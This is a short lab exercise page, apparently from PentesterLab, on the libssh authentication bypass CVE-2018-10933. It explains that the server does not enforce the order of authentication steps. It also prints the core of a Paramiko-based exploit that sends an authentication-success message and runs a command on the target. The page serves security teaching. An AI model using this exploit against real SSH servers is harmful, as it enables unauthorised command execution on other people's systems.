CVE-2018-10933: LibSSH auth bypass

This exercise covers how to bypass authentication on an SSH server based on libssh to gain a shell on the affected system

Free
Tier
Medium
--
0


Introduction

This course details the exploitation of the LibSSH authentication bypass: CVE-2018-10933 and how an attacker can use it to run commands on the underlying system. It can also be used for port redirection in order to gain access to internal systems.

Some details

The issue comes from the way libssh doesn't maintain state for the authentication and how this can be used to bypass the authentication. Basically, think of the connection as a multi-step process: step1, step2, step3... Since libssh doesn't enforce the order of the steps, you can basically jump to step3 without going through step1 and step2.

Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.

Finally, this code is based on the example code examples/ssh_server_fork.c that requires to be "backdoored" to work properly as the actual code is keeping state...

Exploiting this bug

There are plenty of exploits available in the wild, most of them rely on the Paramiko library and are very short. The most important part of the code looks something like:

sock = socket.socket()
  try:
    sock.connect((str(hostname), int(port)))

    message = paramiko.message.Message()
    transport = paramiko.transport.Transport(sock)
    transport.start_client()

    message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
    transport._send_message(message)

    cmd = transport.open_session()
    cmd.exec_command("uname")

You connect to the victim using a socket based on the hostname and port, then you wrap paramiko around the socket. Then, you can send the message telling the server that you are successfully authenticated. Finally, you can send the command you want to run (uname in the code above).

Conclusion

This exercise showed you how to exploit a libssh authentication bypass bug (aka CVE-2018-10933).

I hope you enjoyed learning with PentesterLab.